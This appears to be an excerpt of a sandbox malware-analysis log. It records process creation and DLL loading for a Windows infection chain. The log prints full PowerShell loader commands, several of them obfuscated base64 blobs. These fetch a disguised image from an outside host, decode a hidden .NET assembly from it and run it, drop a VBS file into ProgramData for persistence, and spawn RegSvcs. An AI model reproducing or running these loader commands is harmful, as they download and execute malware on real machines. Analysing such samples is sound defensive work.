BsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yamowx/mn/moc.72evlove.www//:sptth' , '1' , 'C:\ProgramData\' , 'moquenqueiro','RegSvcs',''))} }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\moquenqueiro.vbs"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\moquenqueiro.vbs"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\moquenqueiro.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yamowx/mn/moc.72evlove.www//:sptth' , '1' , 'C:\ProgramData\' , 'moquenqueiro','RegSvcs',''))} }"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\moquenqueiro.vbs"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: adsnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: drprov.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntlanman.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: davclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: davhlpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
